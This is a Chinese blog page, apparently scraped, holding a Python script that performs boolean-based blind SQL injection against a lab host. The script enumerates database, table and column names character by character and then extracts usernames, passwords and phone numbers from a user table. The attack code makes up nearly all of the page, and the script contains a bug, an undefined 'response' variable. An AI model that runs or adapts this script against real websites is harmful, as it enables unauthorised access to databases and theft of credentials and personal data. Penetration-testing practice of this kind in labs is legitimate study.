当前位置:网站首页>布尔盲注需简化代码
布尔盲注需简化代码
2022-08-03 05:22:00 【wuqinghalasao】
import requests,time,string
# 判断注入点
paylode1="?id=1 and 1=2"
paylode2="?id=1 and 1=1"
url="http://192.168.28.133/boke/aupdata.php"
#获取正确值
res1=requests.get(f'{url}{paylode2}')
response1 = res1.text
# print(response1)
if len(response)==len(response1):
print('不存在布尔漏洞')
else:
print('存在布尔注入漏洞,判断数据库长度')
a1=0
for a in range(6):
res2 = requests.get(f'{url}?id=1 and length(database())={a}-- -')
response3 = res2.text
if len(response3)==len(response1):
a1=a
print(f"数据库长度为{a},开始爆破库名和表名")
break
low = string.ascii_lowercase
res4=''
for a2 in range(a1+1):
for a3 in low:
res3 = requests.get(f"{url}?id=1 and (substr(database(),{a2},1))='{a3}' -- -")
response4=res3.text
if len(response4) == len(response1):
res4+=a3
print(f'数据库名为{res4}')
# 判断表的数量
a5=0
for a4 in range(10):
res5=requests.get(f"{url}?id=1 and (SELECT count(table_name) from information_schema.tables where table_schema='{res4}')={a4}-- -")
response5 = res5.text
# print(response5)
if len(response5) == len(response1):
a5=a4
res8=[]
# 取表名
for a6 in range(a5):
res7 = ''
for a7 in range(1,10):
for a8 in low:
# print(a6,a7,a8)
res6 = requests.get(f"{url}?id=1 and substr((SELECT table_name from information_schema.tables where table_schema='{res4}' LIMIT {a6},1),{a7},1)='{a8}'-- -")
response6=res6.text
if len(response6) == len(response1):
res7+=a8
res8.append(res7)
print(f'数据库{res4}有{res8}表')
# 遍历表
res13=[]
for a9 in res8:
dic={}
# 取列数
for a10 in range(9):
res9=requests.get(f"{url}?id=1 and (SELECT count(column_name) FROM information_schema.columns where table_schema='{res4}' and table_name='{a9}')={a10}")
response7 = res9.text
if len(response7) == len(response1):
# print(a10) 3,8,4,6,7
res12=[]
# 根据列数遍历,列数为a10
for a11 in range(a10):
res10=''
# 根据每列列明长度遍历
for a12 in range(1,10):
# 判断每列的字符
for a13 in low:
res11 = requests.get(f"{url}?id=1 and substr((SELECT column_name FROM information_schema.columns where table_schema='{res4}' and table_name='{a9}' limit {a11},1),{a12},1)='{a13}'-- -")
response8=res11.text
if len(response8) == len(response1):
res10+=a13
res12.append(res10)
dic[a9]=res12
res13.append(dic)
print(f'库表对应{res13}')
# 取出行数用户表行数
a15=0
for a14 in range(1,3):
res14=requests.get(f"{url}?id=1 and (select count(*) from stu) ={a14}")
response9 = res14.text
if len(response9) == len(response1):
a15=a14
break
#遍历用户名密码手机号
loww='abcdefghijklmnopqrstuvwxyz,1234567890'
res17=[]
for a16 in range(a15):
res16 = ''
for a17 in range(1,25):
for a18 in loww:
res15 = requests.get(f"{url}?id=1 and substr((select concat_ws(',',sname,password,phone) from stu limit {a16},1),{a17},1) ='{a18}'")
response10=res15.text
if len(response10) == len(response1):
res16+=a18
res17.append(res16)
print(f'用户名,密码,电话为{res17}')边栏推荐
猜你喜欢

The ` monorepo ` ` hoist ` mechanism lead to the change of the loading configuration file path

用pulp库解决运输问题【详细】

【DC-5靶场渗透】

一劳永逸解决vs编译器无法使用scanf函数

Flask,3-6

用C语言来实现五子棋小游戏

Sqli-labs-master shooting range 1-23 customs clearance detailed tutorial (basic)

用C语言来实现扫雷小游戏

mysql 客户端SSL错误2026 (HY000)

玩转Markdown(2) —— 抽象语法树的提取与操纵
随机推荐
【按位取反,逻辑操作符,条件操作符,逗号表达式,下标引用,函数调用,结构体】操作符后续+表达式求值(上)
中国生活服务O2O行业发展现状与市场规模预测报告2022~2028年
嵌入式实验二注意点
【打印菱形】
MySQL 索引详解和什么时候创建索引什么时候不适用索引
图的最短路径的核心——松弛技术
让小程序开发进入 `tailwind jit` 时代
Greetings(状压DP,枚举子集转移)
Sentinel初次使用Demo测试
中国融资租赁行业市场投资分析与前景战略规划建议报告2022~2028年
jsp通过form表单提交数据到servlet报404
Leetcode刷题——128. 最长连续序列
7.17(7)
中国柔性制造系统(FMS)市场发展动态及未来趋势预测报告2022~2028年
Flask,7
中国人力资源服务行业投资建议与前景战略规划研究报告2022~2028年
Kettle Spoon 安装配置详解
【源码解读】你买的NFT到底是什么?
Playing with Markdown(2) - Extraction and Manipulation of Abstract Syntax Trees
【圣诞节给爱的人打印一颗圣诞树吧】超详细代码实现——圣诞树打印